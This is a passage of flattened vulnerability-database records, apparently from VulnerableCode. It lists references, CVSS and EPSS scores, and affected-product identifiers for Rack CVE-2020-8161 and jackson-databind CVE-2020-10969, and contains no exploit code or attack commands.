scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack
5
reference_url https://github.com/rack/rack/commit/dddb7ad18ed79ca6ab06ccc417a169fde451246e
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack/commit/dddb7ad18ed79ca6ab06ccc417a169fde451246e
6
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8161.yml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8161.yml
7
reference_url https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3
scoring_elements
1
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA
8
reference_url https://groups.google.com/g/rubyonrails-security/c/IOO1vNZTzPA
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/IOO1vNZTzPA
9
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html
10
reference_url https://lists.debian.org/debian-lts-announce/2023/01/msg00038.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2023/01/msg00038.html
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8161
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8161
12
reference_url https://usn.ubuntu.com/4561-1
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4561-1
13
reference_url https://usn.ubuntu.com/4561-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4561-1/
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1838281
reference_id 1838281
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1838281
15
reference_url https://github.com/advisories/GHSA-5f9h-9pjv-v6j7
reference_id GHSA-5f9h-9pjv-v6j7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5f9h-9pjv-v6j7
16
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
17
reference_url https://usn.ubuntu.com/4561-2/
reference_id USN-4561-2
reference_type
scores
url https://usn.ubuntu.com/4561-2/
fixed_packages
aliases CVE-2020-8161, GHSA-5f9h-9pjv-v6j7
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8zkw-y3yd-yuft
22
url VCID-9qdt-7p83-4yd8
vulnerability_id VCID-9qdt-7p83-4yd8
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10969.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10969.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10969
reference_id
reference_type
scores
0
value 0.01035
scoring_system epss
scoring_elements 0.77381
published_at 2026-04-13T12:55:00Z
1
value 0.01035
scoring_system epss
scoring_elements 0.77384
published_at 2026-04-12T12:55:00Z
2
value 0.01035
scoring_system epss
scoring_elements 0.77405
published_at 2026-04-11T12:55:00Z
3
value 0.01035
scoring_system epss
scoring_elements 0.77378
published_at 2026-04-09T12:55:00Z
4
value 0.01035
scoring_system epss
scoring_elements 0.77369
published_at 2026-04-08T12:55:00Z
5
value 0.01035
scoring_system epss
scoring_elements 0.77358
published_at 2026-04-04T12:55:00Z
6
value 0.01035
scoring_system epss
scoring_elements 0.7733
published_at 2026-04-02T12:55:00Z
7
value 0.01035
scoring_system epss
scoring_elements 0.77323
published_at 2026-04-01T12:55:00Z
8
value 0.01035
scoring_system epss
scoring_elements 0.77338
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10969
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10969
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10969
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/6ba48457984943df0de92c54144f7dcae01b1221
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/6ba48457984943df0de92c54144f7dcae01b1221
5
reference_url https://github.com/FasterXML/jackson-databind/issues/2642
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://github.com/FasterXML/jackson-databind/issues/2642
6
reference_url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
7
reference_url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
8
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-10969
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:P
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-10969
10
reference_url https://security.netapp.com/advisory/ntap-20200403-0002
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200403-0002
11
reference_url https://security.netapp.com/advisory/ntap-20200403-0002/
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://security.netapp.com/advisory/ntap-20200403-0002/
12
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://www.oracle.com/security-alerts/cpujan2021.html
13
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://www.oracle.com/security-alerts/cpujul2020.html
14
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://www.oracle.com/security-alerts/cpuoct2020.html
15
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:45Z/
url https://www.oracle.com/security-alerts/cpuoct2021.html
16
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1819212
reference_id 1819212
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1819212
17
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_id cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
21
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
23
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
24
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
25
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
26
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
27
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
40
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
41
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
42
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
43
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
48
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
49
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
50
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
51
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
52
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
53
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
54
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_type
scores
